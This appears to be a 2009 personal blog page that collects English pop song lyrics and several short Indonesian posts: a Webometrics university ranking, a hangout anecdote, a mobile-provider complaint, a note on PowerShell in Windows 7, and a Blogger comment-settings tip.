So just say. So just say,

That you'll stay awake for me.
I don't wanna miss anything.
I don't wanna miss anything.
I will share the air I breathe,
I'll give you my heart on a string,
I just don't wanna miss anything
 

Secondhand Serenade - Fall For You

The best thing about tonight's that we're not fighting...
Could it be that we have been this way before?
I know you don't think that I am trying...
I know you're wearing thin down to the core...

But hold your breath
Because tonight will be the night that I will fall for you
Over again...
Don't make me change my mind.
I won't live to see another day, I swear it's true...
Because a girl like you is impossible to find,
You're impossible to find.

This is not what I intended...
I always swore to you I'd never fall apart...
You always thought that I was stronger
I may have failed
But I have loved you from the start
Ohhhh
But hold your breath
Because tonight will be the night that I will fall for you
Over again...
Don't make me change my mind.
Or I wont live to see another day, I swear it's true...
Because a girl like you is impossible to find,
It's impossible.

So breathe in so deep,
Breathe me in.
I'm your's to keep
And hold onto your words.
Cause talk is cheap.
And remember me tonight
When you're asleep.

Because tonight will be the night that I will fall for you
Over again...
Don't make me change my mind.
Or I wont live to see another day, I swear it's true...
Because a girl like you is impossible to find...
Tonight will be the night that I will fall for you
Over again
Don't make me change my mind.
Or I wont live to see another day, I swear it's true.
Because a girl like you is impossible to find,
You're impossible to find...
 

Goo Goo Dolls - Iris

Verse 1

And I'd give up forever to touch you
Cause I know that you feel me somehow
You're the closest to heaven that I'll ever be
And I don't want to go home right now
Verse 2

And all I can taste is this moment
And all I can breathe is your life
Cause sooner or later it's over
I just don't want to miss you tonight
Chorus

And I don't want the world to see me
Cause I don't think that they'd understand
When everything's made to be broken
I just want you to know who I am
Verse 3

And you can't fight the tears that ain't coming
Or the moment of truth in your lies
When everything seems like the movies
Yeah you bleed just to know your alive

Chorus

And I don't want the world to see me
Cause I don't think that they'd understand
When everything's made to be broken
I just want you to know who I am
Chorus

I don't want the world to see me
Cause I don't think that they'd understand
When everything's made to be broken
I just want you to know who I am

I just want you to know who I am
I just want you to know who I am
I just want you to know who I am
I just want you to know who I am
 

Chicago - Love will come back

 I don't love you anymore
We've all heard those words before
Somebody takes your heart and then
Leaves you by pieces

Lying shattered on the floor
They say that when you close the door
Another one is waiting there
For you to open
If you believe

Love will come back--
Hit you when you least expect it
And fill in the cracks
Of the broken heart
You thought that you would never mend
You, you can start again


When you're barely getting by
And it's hard to find the strength to try
And loneliness is all you know
If you let go
Then you will find

When you think you've lost your way
All you really need
Is a little faith

You can now return to
You, you can start again.
 

Peringkat Universitas Terbaik 2009!

ybermetrics Lab baru saja merilis peringkat universitas terbaik di dunia berdasarkan eksistensinya di internet. Dari 16.000 perguruan tinggi di seluruh dunia yang ikut dinilai, Indonesia menempatkan 26 wakilnya dalam kelompok 5000 besar dunia. Pemeringkatan ini memang hanya mengukur sejauhmana sebuah perguruan tinggi memanfaatkan internet. Tetapi, penting dicatat, perguruan tinggi- perguruan tinggi terbaik dunia saat ini, juga memiliki ranking webometrics yang sangat baik.

Berikut daftar selengkapnya:

Ranking Dunia – Perguruan Tinggi
623 - Gadjah Mada University
676 - Institute of Technology Bandung
906 - University of Indonesia *
1604 - Gunadarma University
1762 -  Institut Teknologi Sepuluh Nopember
1960 - Sekolah Tinggi Teknologi Telkom
2013 - Petra Christian University
2152 - Brawijaya University
2159  - Sebelas Maret University
2672  - Airlangga University
2730 - Universitas Padjadjaran
3016 - Electronic Engineering Polytechnic Institute of Surabaya
3138  - Diponegoro University
3198  - Hasanuddin University
3254  - Universitas Sumatera Utara
3310 - Yogyakarta State University
3347 -  Indonesia University of Education *
3491 -  Lampung University
3669  - Duta Wacana Christian University
3821 - Universitas Islam Indonesia
3950  - Universitas Udayana
3983  - Maranatha Christian University
4430 - Universitas Mercubuana
4572  - Universitas Jenderal Soedirman
4780 - Jember University
4800 - Semarang State University
 

Forum yg menegangkan...!!!

ehemm...
Gokiel bgt dh...
dsni w pngn crita tentang tongkrongan w,tepatnya pas hari selasa tgl 26 april 2009 ada kejadian ayng sangat menegangkan bgt...
smwa nak² coco d kumpulin dh tuh rame² membentuk suatu forum gtu deh :D :D
yg nma ny "R" d bahas abiz d stu..
wkt ntu sih w lg jaga d billing..jd gk bgitu dengerin bgt ...tp w tw sih ape yg d omongin nak²...
oh iy yg lbh enk ny lg yaitu pas lg si "R" d forumin w ma tmn w eli dlu dh tuh bir...biar g tegang gtu .(knp gk minum kuku bima aj y..biar naek tuh ucok)hahahah...99x
nak² dh ngomong panjang lebar ampe 3 jam lbh dh tuh tp si "R" tetep aj dengna wajah yg polos,kata² yg imoet gtu mnjwb.."mank slh w dmne..???"(klo gk lsh sih)
wah nak² pada kesel bgt dh tuh..scara dh d pus tetap gk ngerti..kan parah bgt tuh..
kira² jam 11.30 mlm w bl dh tuh d anterin tmn w..and w gk tw sih eding ny kya gmna..
yg w tw dr tmn w mah udh gk da masalah..tp ttp aj sih mnurut w pst da something d nak²...
 

Pindah ke lain hati : kisah pencarian seorang pemuda dalam mencari pasangannya



Sudah beberapa minggu ini handphone saya :
1. Sulit dihubungi : tidak ada tanda telpon masuk, namun kemudian customer komplain karena tidak bisa menghubungi saya.
2. Sulit menghubungi : kualitas percakapan amburadul, seperti sedang berada di dalam bunker/basement, padahal sinyal full.
3. Sulit mengirim SMS
4. Sulit menerima SMS : bisa delay berhari-hari. Atau malah tidak diterima sama sekali.

Duh XL … jor-joran promosi sih boleh saja. Tapi mbok ya jangan dengan mengorbankan kualitas layanan seperti begini.
Akhirnya dengan terpaksa saya memutuskan bahwa saya tidak lagi bisa menggunakan jasa XL Xplor. Tidak jelas kapan kualitas layanannya akan bisa membaik kembali. Sedangkan saya memerlukan fasilitas komunikasi yang memadai untuk bisnis.
Lalu mulailah proses pencarian saya (aka: sang pemuda beranak empat :D ) untuk menemukan pasangan (provider komunikasi) nya yang baru.
Oh ya, proses pencarian dibatasi hanya pada provider GSM, karena HP saya Nokia E70.

Beberapa yang saya temukan :
1. Indosat : Sinyal Kuat ? Sepertinya sih tidak.
2. XL : Noooo… *sob* *sob*
3. Telkomsel : simPATI bisa mahal sekali, kartu As apa lagi. Hm.. Halo kelihatannya OK. Kualitasnya juga sudah dibuktikan anggota keluarga saya lainnya selama bertahun-tahun.
Maka hari ini saya ke gerai Halo, dan telah mendapatkan sebuah nomor baru yang akan aktif dalam waktu sekitar 5 hari lagi.
Bagi Anda yang masih kebingungan dengan perang tarif antar operator pada saat ini, silahkan bisa baca keterangan mas Khalid disini. Sangat informatif.
Selamat kaget bahwa ternyata prabayar yang pada mengaku murah itu ternyata sebetulnya tetap mahal.

NB: masih bengong karena antara judul dengan isi posting gak nyambung ? :P
Nyambung kok sebenarnya, tapi diplesetkan saja. Daripada judulnya marah-marah, saya kepikiran dibecandain saja deh. He he. Maaf kalau mengecewakan :D

 

Windows7 Include PowerShell v2




Sejak Windows 2008 diperkenalkan beberapa waktu lalu, PowerShel sudah mulai banyak digunakan. Hanya untuk lingkungan desktop seperti di Windows XP, Windows Vista dan lain-lain masih merupakan apikasi tambahan yang harus diinstalasi. Namun pada Windows 7 fasiltas PowerShell ini sudah bisa dignakan tanpa harus menginstalasi secara terpisah.
Windows PowerShell merupakan fasilitas baru dari Microsoft Windows. Perintah command-line ini dirancang khusus bagi sistem administrator. PowerShell ini mencakup prompt interaktif dan scripting dalam lingkungan yang dapat digunakan secara terpisah ataupun dilingkungan desktop dengan memanggilnya seperti aplikasi biasa. Setelah itu segera takan tampilPowerShell v2 yang kebetulan saya coba adalah versi yang ada di Windows 7.
Tidak seperti perintah command line yang ada di Server Core ataupun dengan menggunakan perintaj CMD untuk menampilkan prompt, Windows PowerShell dibangun di atas .NET secara runtime (CLR) dan. NET Framework.
Sistem ini merupakan suatu perubahan yang cukup signifikan dari keluarga Windows sehingga akan membawa pengguna ke lingkungan yang benar-benar baru untuk konfigurasi sebuah sistem berbasis Microsoft Windows.
Sdangkan konsep Windows PowerShell sendiri yaitu berupa cmdlet dan merupakan satu-fungsi atau perintah berupa perintah baris atau command line. Anda dapat menggunakan setiap saat fungsi cmdlet ini untuk melakukan berbagai tugas yang kompleks sekalipun. Windows PowerShell meliputi lebih dari seratus dasar inti cmdlets, dan Anda dapat menulis sendiri cmdlets dan membaginya dengan pengguna lain.

Windows PowerShell akan memerikan berbagai kemudahan dan kecepatan bagi Anda untuk akses ke file sistem pada komputer yang digunakan. Selain itu, layanan Windows PowerShell memungkinkan pengguna untuk mengakses data lainnya

Sumber: Google.com

 

Feature Draft Blogger

Emang Blogger terus Selalu memberikan pelayanan yang memudahkan para Penggunannnya.. salah satu Featurenya adalah [Blogger In Draf].

cara Menggunakannya Mudah ketik aja URLnya di http://draft.blogger.com/

Didalam Draft Blogger ini ada Feature Membuat Kotak komentar dibawah postingan.. maksudnya apa sih?? ituloh kaya Kotak Komentar Yang ada di Wordpress yang langsung di bawah article...

cara Mengaturnya mudah kalo sudah masuk ke http://draft.blogger.com/ pilih tab {Setting/Pengaturan}terus Klik juga {Comment/Komentar}.Contoh Gambarnya bisa diliat seperti yang dibawah ini.. :





Tuh yang dilingkari warna merah settinganya,,, Kemudian setelah itu {Save/Simpan}
Dan silahkan lihat hasil Modifikasinya..


Semoga Berhasil..